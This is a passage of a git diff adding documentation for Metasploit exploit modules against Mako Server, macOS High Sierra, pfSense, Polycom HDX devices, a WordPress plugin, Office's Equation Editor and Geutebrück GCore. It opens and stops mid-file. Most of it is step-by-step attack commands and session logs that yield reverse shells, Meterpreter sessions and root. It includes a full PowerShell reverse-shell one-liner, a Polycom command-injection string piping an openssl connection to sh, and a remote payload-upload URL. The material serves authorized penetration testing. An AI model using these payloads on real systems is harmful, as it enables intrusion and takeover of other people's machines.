6. Do: ```set RHOST ``` + 7. Do: ```set PAYLOAD cmd/windows/reverse_powershell``` + 8. Do: ```set LHOST ``` + 9. Do: ```exploit``` + 10. You should get a Windows command shell + +## Verification Steps for Linux + + 1. Extract the "mako.linux-x64.tar.gz" on a Linux Ubuntu 16.04 LTS (x64) target (with Python for this example to work) + 2. From inside the extracted folder, do ```./rundemo.sh``` + 4. Start msfconsole on host + 5. Do: ```use exploit/multi/http/makoserver_cmd_exec``` + 6. Do: ```set RHOST ``` + 7. Do: ```set PAYLOAD cmd/unix/python_reverse``` + 8. Do: ```set LHOST ``` + 9. Do: ```exploit``` + 10. You should get a Linux command shell (may need to wait ~30 seconds) + +## Example Output +``` +msf > use exploit/multi/http/makoserver_cmd_exec +msf exploit(makoserver_cmd_exec) > set RHOST 10.10.10.3 +RHOST => 10.10.10.3 +msf exploit(makoserver_cmd_exec) > set PAYLOAD cmd/windows/reverse_powershell +PAYLOAD => cmd/windows/reverse_powershell +msf exploit(makoserver_cmd_exec) > set LHOST 10.10.10.2 +LHOST => 10.10.10.2 +msf exploit(makoserver_cmd_exec) > exploit + +[*] Started reverse TCP handler on 10.10.10.2:4444 +[*] Sending payload to target... +[*] Command shell session 1 opened (10.10.10.2:4444 -> 10.10.10.3:49175) at 2017-10-26 21:23:59 -0400 + +Microsoft Windows +Copyright (c) 2009 Microsoft Corporation. All rights reserved. + +C:\Users\Smith\Downloads\MakoServer> + +``` + +## Example Verbose Output +``` +msf > use exploit/multi/http/makoserver_cmd_exec +msf exploit(makoserver_cmd_exec) > set RHOST 10.10.10.3 +RHOST => 10.10.10.3 +msf exploit(makoserver_cmd_exec) > set VERBOSE true +VERBOSE => true +msf exploit(makoserver_cmd_exec) > set PAYLOAD cmd/windows/reverse_powershell +PAYLOAD => cmd/windows/reverse_powershell +msf exploit(makoserver_cmd_exec) > set LHOST 10.10.10.2 +LHOST => 10.10.10.2 +msf exploit(makoserver_cmd_exec) > check + +[*] Trying to detect running Mako Server and necessary files... +[*] Mako Server save.lsp returns correct ouput. +[*] 10.10.10.3:80 The target appears to be vulnerable. +msf exploit(makoserver_cmd_exec) > exploit + +[*] Started reverse TCP handler on 10.10.10.2:4444 +[*] Sending payload to target... +[*] Now executing the following command: os.execute([[powershell -w hidden -nop -c function RSC{if ($c.Connected -eq $true) {$c.Close()};if ($p.ExitCode -ne $null) {$p.Close()};exit;};$a='10.10.10.2';$p='4444';$c=New-Object system.net.sockets.tcpclient;$c.connect($a,$p);$s=$c.GetStream();$nb=New-Object System.Byte[] $c.ReceiveBufferSize;$p=New-Object System.Diagnostics.Process;$p.StartInfo.FileName='cmd.exe';$p.StartInfo.RedirectStandardInput=1;$p.StartInfo.RedirectStandardOutput=1;$p.StartInfo.UseShellExecute=0;$p.Start();$is=$p.StandardInput;$os=$p.StandardOutput;Start-Sleep 1;$e=new-object System.Text.AsciiEncoding;while($os.Peek() -ne -1){$o += $e.GetString($os.Read())};$s.Write($e.GetBytes($o),0,$o.Length);$o=$null;$d=$false;$t=0;while (-not $d) {if ($c.Connected -ne $true) {RSC};$pos=0;$i=1; while (($i -gt 0) -and ($pos -lt $nb.Length)) {$r=$s.Read($nb,$pos,$nb.Length - $pos);$pos+=$r;if (-not $pos -or $pos -eq 0) {RSC};if ($nb[0..$($pos-1)] -contains 10) {break}};if ($pos -gt 0){$str=$e.GetString($nb,0,$pos);$is.write($str);start-sleep 1;if ($p.ExitCode -ne $null){RSC}else{$o=$e.GetString($os.Read());while($os.Peek() -ne -1){$o += $e.GetString($os.Read());if ($o -eq $str) {$o=''}};$s.Write($e.GetBytes($o),0,$o.length);$o=$null;$str=$null}}else{RSC}};]]) +[*] Sending PUT request to save.lsp... +[*] Sending GET request to manage.lsp... +[*] Command shell session 1 opened (10.10.10.2:4444 -> 10.10.10.3:49174) at 2017-10-26 21:21:08 -0400 + +Microsoft Windows +Copyright (c) 2009 Microsoft Corporation. All rights reserved. + +C:\Users\Smith\Downloads\MakoServer> + +``` + +## Scenarios + +### Targeting Windows 7 SP1 x64 running Mako Server v2.5 + + A typical scenario would be to obtain a Windows command shell and then upgrade to a Meterpreter session: + + ``` + msf > use exploit/multi/http/makoserver_cmd_exec + msf exploit(makoserver_cmd_exec) > set RHOST 10.10.10.2 + RHOST => 10.10.10.2 + msf exploit(makoserver_cmd_exec) > set PAYLOAD cmd/windows/reverse_powershell + PAYLOAD => cmd/windows/reverse_powershell + msf exploit(makoserver_cmd_exec) > set LHOST 10.10.10.4 + LHOST => 10.10.10.4 + msf exploit(makoserver_cmd_exec) > check + [*] 10.10.10.2:80 The target appears to be vulnerable. + msf exploit(makoserver_cmd_exec) > exploit + + [*] Started reverse TCP handler on 10.10.10.4:4444 + [*] Sending payload to target... + [*] Command shell session 1 opened (10.10.10.4:4444 -> 10.10.10.2:49189) at 2017-10-25 20:57:56 -0400 + + Microsoft Windows + Copyright (c) Microsoft Corporation. All rights reserved. + + C:\Users\Smith\Downloads\MakoServer>^Z + Background session 1? [y/N] y + msf exploit(makoserver_cmd_exec) > use multi/manage/shell_to_meterpreter + msf post(shell_to_meterpreter) > sessions -l + + Active sessions + =============== + + Id Name Type Information Connection + -- ---- ---- ----------- ---------- + 1 shell cmd/windows 10.10.10.4:4444 -> 10.10.10.2:49189 (10.10.10.2) + msf post(shell_to_meterpreter) > set SESSION 1 + SESSION => 1 + msf post(shell_to_meterpreter) > set LPORT 8080 + LPORT => 8080 + msf post(shell_to_meterpreter) > exploit + + [*] Upgrading session ID: 1 + [*] Starting exploit/multi/handler + [*] Started reverse TCP handler on 10.10.10.4:8080 + [-] Powershell is not installed on the target. + [*] Command stager progress: 1.66% (1699/102108 bytes) + ... + [*] Command stager progress: 100.00% (102108/102108 bytes) + [*] Post module execution completed + msf post(shell_to_meterpreter) > sessions -l + + Active sessions + =============== + + Id Name Type Information Connection + -- ---- ---- ----------- ---------- + 1 shell cmd/windows 10.10.10.4:4444 -> 10.10.10.2:49189 (10.10.10.2) + 2 meterpreter x86/windows smith-PC\smith @ SMITH-PC 10.10.10.4:8080 -> 10.10.10.2:49190 (10.10.10.2) + + msf post(shell_to_meterpreter) > sessions -i 2 + [*] Starting interaction with 2... + + meterpreter > getuid + Server username: smith-PC\smith + meterpreter > sysinfo + Computer : SMITH-PC + OS : Windows 7 (Build 7601, Service Pack 1). + Architecture : x64 + System Language : en_US + Domain : WORKGROUP + Logged On Users : 2 + Meterpreter : x86/windows + ``` + +### Targeting Linux Ubuntu 16.04 LTS x64 running Mako Server v2.5 + + A typical scenario would be to obtain a Linux command shell and then upgrade to a Meterpreter session: + + ``` + msf > use exploit/multi/http/makoserver_cmd_exec + msf exploit(makoserver_cmd_exec) > set RHOST 10.10.10.2 + RHOST => 10.10.10.2 + msf exploit(makoserver_cmd_exec) > set PAYLOAD cmd/unix/reverse_python + PAYLOAD => cmd/unix/reverse_python + msf exploit(makoserver_cmd_exec) > set LHOST 10.10.10.4 + LHOST => 10.10.10.4 + msf exploit(makoserver_cmd_exec) > check + [*] 10.10.10.2:80 The target appears to be vulnerable. + msf exploit(makoserver_cmd_exec) > exploit + + [*] Started reverse TCP handler on 10.10.10.4:4444 + [*] Sending payload to target... + [*] Command shell session 1 opened (10.10.10.4:4444 -> 10.10.10.2:57888) at 2017-11-10 15:52:33 -0500 + + ls + LICENSE.txt + mako + mako.zip + README.txt + rundemo.sh + tutorial + ^Z + Background session 1? [y/N] y + msf exploit(makoserver_cmd_exec) > use multi/manage/shell_to_meterpreter + msf post(shell_to_meterpreter) > sessions -l + + Active sessions + =============== + + Id Name Type Information Connection + -- ---- ---- ----------- ---------- + 1 shell cmd/unix 10.10.10.4:4444 -> 10.10.10.2:57888 (10.10.10.2) + + msf post(shell_to_meterpreter) > set SESSION 1 + SESSION => 1 + msf post(shell_to_meterpreter) > set LPORT 8080 + LPORT => 8080 + msf post(shell_to_meterpreter) > exploit + + [*] Upgrading session ID: 1 + [*] Starting exploit/multi/handler + [*] Started reverse TCP handler on 10.10.10.4:8080 + [*] Sending stage (847604 bytes) to 10.10.10.2 + [*] Meterpreter session 2 opened (10.10.10.4:8080 -> 10.10.10.2:60448) at 2017-11-10 15:54:38 -0500 + [*] Command stager progress: 100.00% (736/736 bytes) + [*] Post module execution completed + msf post(shell_to_meterpreter) > sessions -l + + Active sessions + =============== + + Id Name Type Information Connection + -- ---- ---- ----------- ---------- + 1 shell cmd/unix 10.10.10.4:4444 -> 10.10.10.2:57888 (10.10.10.2) + 2 meterpreter x86/linux uid=1000, gid=1000, euid=1000, egid=1000 @ 10.10.10.2 10.10.10.4:8080 -> 10.10.10.2:60448 (10.10.10.2) + msf post(shell_to_meterpreter) > sessions -i 2 + [*] Starting interaction with 2... + + meterpreter > getuid + Server username: uid=1000, gid=1000, euid=1000, egid=1000 + meterpreter > sysinfo + Computer : 10.10.10.2 + OS : Ubuntu 16.04 (Linux 4.10.0-35-generic) + Architecture : x64 + Meterpreter : x86/linux + ``` diff --git a/documentation/modules/exploit/osx/local/root_no_password.md b/documentation/modules/exploit/osx/local/root_no_password.md new file mode 100644 index 0000000000..ac793fa6fa --- /dev/null +++ b/documentation/modules/exploit/osx/local/root_no_password.md @@ -0,0 +1,104 @@ +## Vulnerable Application +This vulnerability works against OSX 10.13 (High Sierra). Early +research (https://objective-see.com/blog/blog_0x24.html) suggests that +the vulnerability is the result of multiple errors ultimately started by +an incorrect return value from triggered by the function +`od_verify_crypt_password` returning true even if the account is +disabled. The subsequent function calls appear to validate and create +the password, though there is still a lot of research into the bug and +these results should be verified once more research has been published. + +## Verification Steps +1. Get a session on a vulnerable system +2. `use exploit/osx/local/root_no_password` +3. `set lhost ` +4. `set lport ` +5. `set session ` +6. `run` + +## Scenarios +### Example Run +``` +msf exploit(psexec) > use exploit/multi/handler +msf exploit(handler) > set payload osx/x64/meterpreter_reverse_tcp +payload => osx/x64/meterpreter_reverse_tcp +msf exploit(handler) > set lhost +lhost => +msf exploit(handler) > set lport 4567 +lport => 4567 +msf exploit(handler) > run + +[*] Started reverse TCP handler on :4567 +httpserver[*] Meterpreter session 1 opened (:4567 -> :49347) at 2017-11-29 07:28:32 -0600 + +meterpreter > sysinfo +Computer : msfusers-Mac.local +OS : (MacOSX 17.0.0) +Architecture : x64 +Meterpreter : x64/osx +meterpreter > getuid +Server username: uid=501, gid=20, euid=501, egid=20 +meterpreter > background +[*] Backgrounding session 1... +msf exploit(handler) > use exploit/osx/local/root_no_password +msf exploit(root_no_password) > show options + +Module options (exploit/osx/local/root_no_password): + + Name Current Setting Required Description + ---- --------------- -------- ----------- + SESSION yes The session to run this module on. + + +Payload options (osx/x64/meterpreter_reverse_tcp): + + Name Current Setting Required Description + ---- --------------- -------- ----------- + LHOST yes The listen address + LPORT 4444 yes The listen port + + +Exploit target: + + Id Name + -- ---- + 0 Mac OS X 10.13.1 High Sierra x64 (Native Payload) + + +msf exploit(root_no_password) > set lhost +lhost => +msf exploit(root_no_password) > set lport 4562 +lport => 4562 +msf exploit(root_no_password) > set session 1 +session => 1 +msf exploit(root_no_password) > run + +[*] Started reverse TCP handler on :4562 +[*] Writing payload file as '/tmp/cinbvsmrmyxw' +[*] Meterpreter session 2 opened (:4562 -> :62522) at 2017-11-29 07:29:56 -0600 +[*] - Meterpreter session 2 closed. Reason: Died + + +[*] Executing payload file as '/tmp/cinbvsmrmyxw' +[!] This exploit may require manual cleanup of '/tmp/cinbvsmrmyxw' on the target + +[-] Invalid session identifier: 2 +msf exploit(root_no_password) > +msf exploit(root_no_password) > +msf exploit(root_no_password) > run + +[*] Started reverse TCP handler on :4562 +[*] Writing payload file as '/tmp/imtjkakowanv' +[*] Executing payload file as '/tmp/imtjkakowanv' +[*] Meterpreter session 3 opened (:4562 -> :49348) at 2017-11-29 07:30:53 -0600 +[+] Deleted /tmp/imtjkakowanv + +meterpreter > sysinfo +Computer : msfusers-Mac.local +OS : (MacOSX 17.0.0) +Architecture : x64 +Meterpreter : x64/osx +meterpreter > getuid +Server username: uid=0, gid=20, euid=0, egid=20 +meterpreter > +``` diff --git a/documentation/modules/exploit/unix/http/pfsense_group_member_exec.md b/documentation/modules/exploit/unix/http/pfsense_group_member_exec.md new file mode 100644 index 0000000000..9f8d0343f8 --- /dev/null +++ b/documentation/modules/exploit/unix/http/pfsense_group_member_exec.md @@ -0,0 +1,114 @@ +## Description + + This module exploits a vulnerability in pfSense version 2.3 and before which allows an authenticated user to execute arbitrary operating system commands + as root. + + This module has been tested successfully on version 2.3-RELEASE, and 2.2.6. + + +## Vulnerable Application + + This module has been tested successfully on version CE 2.3 amd64, and 2.2.6 amd64. + + Installer: + + * [pfSense CE 2.3](https://nyifiles.pfsense.org/mirror/downloads/old/pfSense-CE-2.3-RELEASE-amd64.iso.gz) + + +## Verification Steps + + 1. Start `msfconsole` + 2. Do: `use exploit/unix/http/pfsense_group_member_exec` + 3. Do: `set rhost [IP]` + 4. Do: `set username [username]` + 5. Do: `set password [password]` + 6. Do: `exploit` + 7. You should get a session + + +## Sample Output + +### 2.3-Release amd64 + +``` +[*] Processing pfsense.rc for ERB directives. +resource (pfsense.rc)> use exploit/unix/http/pfsense_group_member_exec +resource (pfsense.rc)> set rhost 2.2.2.2 +rhost => 2.2.2.2 +resource (pfsense.rc)> set verbose true +verbose => true +resource (pfsense.rc)> set lhost 1.1.1.1 +lhost => 1.1.1.1 +resource (pfsense.rc)> check +[*] 2.2.2.2:443 The target service is running, but could not be validated. +resource (pfsense.rc)> exploit +[*] Started reverse double SSL handler on 1.1.1.1:4444 +[*] CSRF Token for login: sid:a11be2ee5849522898e2c1ff23739b35c76435bf,1510545358;ip:d70924f708189287bdee1e08d7fa83758a0e1f68,1510545358 +[*] Successful Authentication +[*] pfSense Version Detected: 2.3-RELEASE +[+] Login Successful +[*] CSRF Token for group creation: sid:823a6f854ad1bae307c2959e95ccc98a8d72f2c1,1510545361 +[*] Manual removal of group aJPEfJLDKT is required. +[*] Accepted the first client connection... +[*] Accepted the second client connection... +[*] Command: echo 5ER6rqZOjOSGjRml; +[*] Writing to socket A +[*] Writing to socket B +[*] Reading from sockets... +[*] Reading from socket A +[*] A: "5ER6rqZOjOSGjRml\n" +[*] Matching... +[*] B is input... +[*] Command shell session 1 opened (1.1.1.1:4444 -> 2.2.2.2:25824) at 2017-11-19 08:15:00 -0500 + +whoami +root +uname -a +FreeBSD . 10.3-RELEASE FreeBSD 10.3-RELEASE #6 05adf0a(RELENG_2_3_0): Mon Apr 11 18:52:07 CDT 2016 root@ce23-amd64-builder:/builder/pfsense-230/tmp/obj/builder/pfsense-230/tmp/FreeBSD-src/sys/pfSense amd64 +``` +### 2.2.6 amd64 + +``` +[*] Processing pfsense.rc for ERB directives. +resource (pfsense.rc)> use exploit/unix/http/pfsense_group_member_exec +resource (pfsense.rc)> set rhost 3.3.3.3 +rhost => 3.3.3.3 +resource (pfsense.rc)> set verbose true +verbose => true +resource (pfsense.rc)> set lhost 1.1.1.1 +lhost => 1.1.1.1 +resource (pfsense.rc)> check +[*] 3.3.3.3:443 The target is not exploitable. +resource (pfsense.rc)> exploit +[*] Started reverse double SSL handler on 1.1.1.1:4444 +[*] CSRF Token for login: sid:bb80526160efcf79d8660d1a31f6bf88e154b38e,1511091712;ip:42d05b73fc9b2d31c54333a60fd308dfbd4da97a,1511091712 +[*] Successful Authentication +[*] pfSense Version Detected: 2.2.6-RELEASE +[+] Login Successful +[*] CSRF Token for group creation: sid:d49a6dc5b7e98c92a7772c605af3586a1f3adc75,1511091715 +[*] Manual removal of group okUPTvzysL is required. +[*] Accepted the first client connection... +[*] Accepted the second client connection... +[*] Command: echo 7hKg6oD9DkwXYRtt; +[*] Writing to socket A +[*] Writing to socket B +[*] Reading from sockets... +[*] Reading from socket B +[*] B: "7hKg6oD9DkwXYRtt\n" +[*] Matching... +[*] A is input... +[*] Command shell session 1 opened (1.1.1.1:4444 -> 3.3.3.3:34403) at 2017-11-19 06:42:00 -0500 + +whoami +root +uname -a +FreeBSD pfSense.localdomain 10.1-RELEASE-p25 FreeBSD 10.1-RELEASE-p25 #0 c39b63e(releng/10.1)-dirty: Mon Dec 21 15:20:13 CST 2015 root@pfs22-amd64-builder:/usr/obj.RELENG_2_2.amd64/usr/pfSensesrc/src.RELENG_2_2/sys/pfSense_SMP.10 amd64 +``` + +## Cleanup + +Manual cleanup is required. The group name is printed during exploitation. + +## Logging + +Logging into the web interface writes a line to the system out on the console similar to: `pfSense php-fpm[72834]: /index.php: Succeessful login for user 'admin' from [ip]` diff --git a/documentation/modules/exploit/unix/misc/polycom_hdx_traceroute_exec.md b/documentation/modules/exploit/unix/misc/polycom_hdx_traceroute_exec.md new file mode 100644 index 0000000000..94d04ca2f0 --- /dev/null +++ b/documentation/modules/exploit/unix/misc/polycom_hdx_traceroute_exec.md @@ -0,0 +1,131 @@ +Within Polycom HDX series devices, there is a command execution vulneralbility in one of the dev commands `devcmds`, `lan traceroute` which subtituing `$()` or otherwise similiar operand , similiar to [polycom_hdx_auth_bypass](https://github.com/rapid7/metasploit-framework/blob/f250e15b6ee2d7b3e38ee1229bee533a021d1415/modules/exploits/unix/polycom_hdx_auth_bypass.rb) could allow for an attacker to obtain a command shell. Spaces must be replaced with `#{IFS}` aka `Internal Field Seperator` + + +## Vulnerable Application +Tested on the latest and greatest version of the firmware, vendor has not patched since being reported. [Found here](http://downloads.polycom.com/video/hdx/polycom-hdx-release-3.1.10-51067.pup) + +## Options +### PASSWORD +Although a majority of devices come without a password, occasionally when one is required, you can set one to either the default `456`, `admin`, or `POLYCOM`, or +the devices. + + +## Payloads +Supported payloads include the telnet payload `cmd/unix/reverse` but not `cmd/unix/reverse_ssl_double_telnet` Alternatively, `cmd/unix/reverse_openssl` can be used or, your own choice of executing any arbitary command with `cmd/unix/generic` + +``` +Compatible Payloads +=================== + + Name Disclosure Date Rank Description + ---- --------------- ---- ----------- + cmd/unix/generic normal Unix Command, Generic Command Execution + cmd/unix/reverse normal Unix Command Shell, Double Reverse TCP (telnet) + cmd/unix/reverse_openssl normal Unix Command Shell, Double Reverse TCP SSL (openssl) + cmd/unix/reverse_ssl_double_telnet normal Unix Command Shell, Double Reverse TCP SSL (telnet) +``` + +## Verification Steps + +A successful check of the exploit will look like this: +``` +msf exploit(polycom) > set RHOST 192.168.0.17 +RHOST => 192.168.0.17 +msf exploit(polycom) > set LHOSt ens3 +LHOSt => ens3 +msf exploit(polycom) > set LPORT 3511 +LPORT => 3511 +msf exploit(polycom) > show payloads + +Compatible Payloads +=================== + + Name Disclosure Date Rank Description + ---- --------------- ---- ----------- + cmd/unix/generic normal Unix Command, Generic Command Execution + cmd/unix/reverse normal Unix Command Shell, Double Reverse TCP (telnet) + cmd/unix/reverse_openssl normal Unix Command Shell, Double Reverse TCP SSL (openssl) + cmd/unix/reverse_ssl_double_telnet normal Unix Command Shell, Double Reverse TCP SSL (telnet) + +msf exploit(polycom) > set PAYLOAD cmd/unix/reverse +PAYLOAD => cmd/unix/reverse +msf exploit(polycom) > set VERBOSE false +VERBOSE => false +msf exploit(polycom) > run + +[*] Started reverse TCP double handler on 192.168.0.11:3511 +[+] 192.168.0.17:23 - 192.168.0.17:23 - Device has no authentication, excellent! +[+] 192.168.0.17:23 - Sending payload of 126 bytes to 192.168.0.17:34874... +[*] Accepted the first client connection... +[*] Accepted the second client connection... +[*] Command: echo vGopPRp0jBxt4J2D; +[*] Writing to socket A +[*] Writing to socket B +[*] Reading from sockets... +[*] Reading from socket B +[*] B: "vGopPRp0jBxt4J2D\n" +[*] Matching... +[*] A is input... +[*] Command shell session 10 opened (192.168.0.11:3511 -> 192.168.0.17:37687) at 2017-11-15 10:29:58 -0500 +[*] 192.168.0.17:23 - Shutting down payload stager listener... + +id +uid=0(root) gid=0(root) +whoami +root +``` + +## Debugging +Setting `VERBOSE` to true should yield an output of. + +``` +msf exploit(polycom) > set VERBOSE true +VERBOSE => true +rmsf exploit(polycom) > run + +[*] Started reverse TCP double handler on 192.168.0.11:3511 +[*] 192.168.0.17:23 - Received : ! +Polycom Command Shell +XCOM host: localhost port: 4121 +TTY name: /dev/pts/6 +Session type: telnet +2017-11-15 15:33:12 DEBUG avc: pc[0]: XCOM:INFO:server_thread_handler: freeing conn [conn: 0x1266f300] [sock: 104] [thread: 0x12559e68] +2017-11-15 15:33:12 DEBUG jvm: pc[0]: UI: xcom-api: SessionHandler: freeing session 4340 +2017-11-15 15:33:12 DEBUG jvm: pc[0]: UI: xcom-api: ClientManager: deleteSession(sess: 4340) +2017-11-15 15:33:12 DEBUG jvm: pc[0]: UI: xcom-api: ClientManager: deleteSession current open sessions count= 9 +2017-11-15 15:33:12 DEBUG avc: pc[0]: XCOM:INFO:main_server_thread: new connection [conn: 0x1266f300] [sock: 104] +2017-11-15 15:33:12 DEBUG avc: pc[0]: XCOM:INFO:server_thread_handler: new conn [conn: 0x1266f300] [sock: 104] [thread: 0x1255a010] [TID: 3380] +2017-11-15 15:33:12 DEBUG avc: pc[0]: uimsg: [R: telnet /tmp/apiasynclisteners/psh6 /dev/pts/6] +2017-11-15 15:33:13 DEBUG jvm: pc[0]: UI: xcom-api: ClientManager: createSession(type: telnet sess: 4342) +2017-11-15 15:33:13 DEBUG jvm: pc[0]: UI: xcom-api: ClientManager: createSession current open sessions count= 10 +2017-11-15 15:33:13 DEBUG avc: pc[0]: appcom: register_api_session pSession=0x12669918 +2017-11-15 15:33:13 DEBUG avc: pc[0]: appcom: about to call sendJavaMessageEx +2017-11-15 15:33:13 DEBUG avc: pc[0]: appcom: session 4342 registered + +[+] 192.168.0.17:23 - 192.168.0.17:23 - Device has no authentication, excellent! +[+] 192.168.0.17:23 - Sending payload of 126 bytes to 192.168.0.17:37450... +[*] Accepted the first client connection... +[*] Accepted the second client connection... +[*] Command: echo WD3QloY3fys6n7dK; +[*] Writing to socket A +[*] Writing to socket B +[*] Reading from sockets... +[*] 192.168.0.17:23 - devcmds +Entering sticky internal commands *ONLY* mode... +lan traceroute `openssl${IFS}s_client${IFS}-quiet${IFS}-host${IFS}192.168.0.11${IFS}-port${IFS}37873|sh` +2017-11-15 15:33:13 DEBUG avc: pc[0]: uimsg: [D: lan traceroute `openssl${IFS}s_client${IFS}-quiet${IFS}-host${IFS}192.168.0.11${IFS}-port${IFS}37873|sh`] +2017-11-15 15:33:13 DEBUG avc: pc[0]: os: task:DETR pid:3369 thread 4e5ff4c0 11443 12660c68 +2017-11-15 15:33:14 INFO avc: pc[0]: DevMgrEther: Trace Route Command Entry, hostnameORIP: `openssl${IFS}s_client${IFS}-quiet${IFS}-host${IFS}192.168.0.11${IFS}-port${IFS}37873|sh` hop_count: 0 + +[*] Reading from socket B +[*] B: "WD3QloY3fys6n7dK\n" +[*] Matching... +[*] A is input... +[*] Command shell session 11 opened (192.168.0.11:3511 -> 192.168.0.17:38624) at 2017-11-15 10:34:23 -0500 +[*] 192.168.0.17:23 - Shutting down payload stager listener... + +id +uid=0(root) gid=0(root) +whoami +root +``` diff --git a/documentation/modules/exploit/unix/webapp/wp_mobile_detector_upload_execute.md b/documentation/modules/exploit/unix/webapp/wp_mobile_detector_upload_execute.md new file mode 100644 index 0000000000..5443e074ee --- /dev/null +++ b/documentation/modules/exploit/unix/webapp/wp_mobile_detector_upload_execute.md @@ -0,0 +1,63 @@ +## Vulnerable Application + + wp-mobile-detector is a wordpress plugin which was removed from the wordpress site after this vulnerability + was disclosed. Version 3.5 and earlier can be directed to upload a file from a remote web server, and then + the file can be executed by the client. + + Download [wp-mobile-detector](https://www.exploit-db.com/apps/bf8bdbac0b01e14788aa2d4a0d9c6971-wp-mobile-detector.3.5.zip) + from Exploit-db since wordpress removed it. + + Due to its age, it may be difficult to install. The install for the scenario later is: + + * Ubuntu 16.04.2 + * Apache 2.4.18 + * PHP 7 + * Wordpress 4.4.2 + +## Verification Steps + + Example steps in this format (is also in the PR): + + 1. Install the application + 2. Start msfconsole + 3. Do: ```use exploit/unix/webapp/wp_mobile_detector_upload_execute``` + 4. Do: ```set rhost [ip]``` + 5. Do: ```set lhost [ip]``` + 6. Do: ```set srvhost [ip]``` + 7. Do: ```exploit``` + 8. You should get a shell. + +## Scenarios + +### wp-mobile-detector 3.5 on Wordpress 4.4.2 + + ``` + msf > use exploit/unix/webapp/wp_mobile_detector_upload_execute + msf exploit(wp_mobile_detector_upload_execute) > set rhost 2.2.2.2 + rhost => 2.2.2.2 + msf exploit(wp_mobile_detector_upload_execute) > set TARGETURI /wordpress/ + TARGETURI => /wordpress/ + msf exploit(wp_mobile_detector_upload_execute) > check + [*] 2.2.2.2:80 The target appears to be vulnerable. + msf exploit(wp_mobile_detector_upload_execute) > set payload php/meterpreter/reverse_tcp + payload => php/meterpreter/reverse_tcp + smsf exploit(wp_mobile_detector_upload_execute) > set lhost 1.1.1.1 + lhost => 1.1.1.1 + msf exploit(wp_mobile_detector_upload_execute) > set srvhost 1.1.1.1 + srvhost => 1.1.1.1 + msf exploit(wp_mobile_detector_upload_execute) > exploit + [*] Exploit running as background job 2. + + [*] Started reverse TCP handler on 1.1.1.1:4444 + msf exploit(wp_mobile_detector_upload_execute) > [*] Starting Payload Server + [*] Using URL: http://1.1.1.1:8080/ZWTgqwsiFL.php + [*] Uploading payload via /wordpress/wp-content/plugins/wp-mobile-detector/resize.php?src=http://1.1.1.1:8080/ZWTgqwsiFL.php + [+] Payload requested on server, sending + [+] Sleeping 5 seconds for payload upload + [*] Executing the payload via /wordpress/wp-content/plugins/wp-mobile-detector/cache/ZWTgqwsiFL.php + [*] Sending stage (37514 bytes) to 2.2.2.2 + [*] Meterpreter session 1 opened (1.1.1.1:4444 -> 2.2.2.2:47064) at 2017-10-20 22:54:04 -0400 + [+] Deleted ZWTgqwsiFL.php + [*] Server stopped. + ``` + diff --git a/documentation/modules/exploit/windows/fileformat/office_ms17_11882.md b/documentation/modules/exploit/windows/fileformat/office_ms17_11882.md new file mode 100644 index 0000000000..51f8bd7813 --- /dev/null +++ b/documentation/modules/exploit/windows/fileformat/office_ms17_11882.md @@ -0,0 +1,56 @@ + +Module exploits a flaw in how the Equation Editor that allows an attacker to execute arbitrary code in RTF files without interaction. The vulnerability is caused by the Equation Editor, to which fails to properly handle OLE objects in memory. + +## Vulnerable Application + +- Microsoft Office 2016 +- Microsoft Office 2013 Service Pack 1 +- Microsoft Office 2010 Service Pack 2 +- Microsoft Office 2007 + +## Verification Steps + +1. Start msfconsole +2. Do: `use exploit/windows/fileformat/office_ms17_11882` +3. Do: `set PAYLOAD [PAYLOAD]` +4. Do: `run` + +## Options +### FILENAME +Filename to output & if injecting a file, the file to inject + +### FOLDER_PATH +Path to filename to inject + + +## Example + +``` +msf > use exploit/windows/fileformat/office_ms17_11882 +msf exploit(office_ms17_11882) > set FILENAME msf.rtf +FILENAME => /home/mumbai/file.rtf +msf exploit(office_ms17_11882) > set LHOST ens3 +LHOST => ens3 +msf exploit(office_ms17_11882) > set LPORT 35116 +LPORT => 35116 +msf exploit(office_ms17_11882) > run +[*] Using URL: http://0.0.0.0:8080/BUY0DYgc +[*] Local IP: http://192.1668.0.11:8080/BUY0DYgc +[*] Server started. +[*] 192.168.0.24 office_ms17_11882 - Handling initial request from 192.168.0.24 +[*] 192.168.0.24 office_ms17_11882 - Stage two requestd, sending +[*] Sending stage (205379 bytes) to 192.168.0.24 +[*] Meterpreter session 1 opened (192.168.0.11:35116 -> 192.168.0.24:52217) at 2017-11-21 14:41:59 -0500 +sessions -i 1 +[*] Starting interaction with 1... + +meterpreter > sysinfo +Computer : TEST-PC +OS : Windows 7 (Build 7601, Service Pack 1). +Architecture : x64 +System Language : en_US +Domain : WORKGROUP +Logged On Users : 1 +Meterpreter : x64/windows +meterpreter > +``` diff --git a/documentation/modules/exploit/windows/http/geutebrueck_gcore_x64_rce_bo.md b/documentation/modules/exploit/windows/http/geutebrueck_gcore_x64_rce_bo.md new file mode 100644 index 0000000000..91d3629bc9 --- /dev/null +++ b/documentation/modules/exploit/windows/http/geutebrueck_gcore_x64_rce_bo.md @@ -0,0 +1,69 @@ +## Vulnerable Application + + Geutebrück GCore Server 1.3.8.42, 1.4.2.37 are vulnerable to a buffer overflow exploitation. + Since this application is started with system privileges this allows a system remote code execution. + +## Verification Steps + + 1. Install Windows as basic OS (Tested with Win2012R2, Windows 7) + 2. Install the Geutebrück GCore server + 3. Verify that http://:13003/statistics/runningmoduleslist.xml available is. + 4. Start msfconsole + 5. Do: ```use [exploit/windows/http/geutebrueck_gcore_x64_rce_bo]``` + 6. Do: ```set rhost ``` + 7. Do: ```set rport 13003``` + 8. Do: ```set payload windows/x64/meterpreter/reverse_tcp``` + 9. Do: ```exploit``` + 10. You should get a shell as NT/SYSTEM. + +## Scenarios + +### Geutebrueck GCore 1.4.2.37 + +``` +msf exploit(geutebrueck_gcore_x64_rce_bo) > show options + +Module options (exploit/windows/http/geutebrueck_gcore_x64_rce_bo): + + Name Current Setting Required Description + ---- --------------- -------- ----------- + RHOST 192.168.1.10 yes The target address + RPORT 13003 yes The target port + + + + Payload options (windows/x64/meterpreter/reverse_tcp): + + Name Current Setting Required Description + ---- --------------- -------- ----------- + EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none) + LHOST 192.168.1.11 yes The listen address + LPORT 4444 yes The listen port + + + Exploit target: + + Id Name + -- ---- + 0 Automatic Targeting + +msf exploit(geutebrueck_gcore_x64_rce_bo) > exploit + [*] Started reverse TCP handler on 192.168.1.11:4444 + [*] 192.168.1.10:13003 - Trying to fingerprint server with http://192.168.1.10:13003/statistics/runningmoduleslist.xml... + [*] 192.168.1.10:13003 - Vulnerable version detected: GCore 1.4.2.37, Windows x64 (Win7, Win8/8.1, Win2012R2,...) + [*] 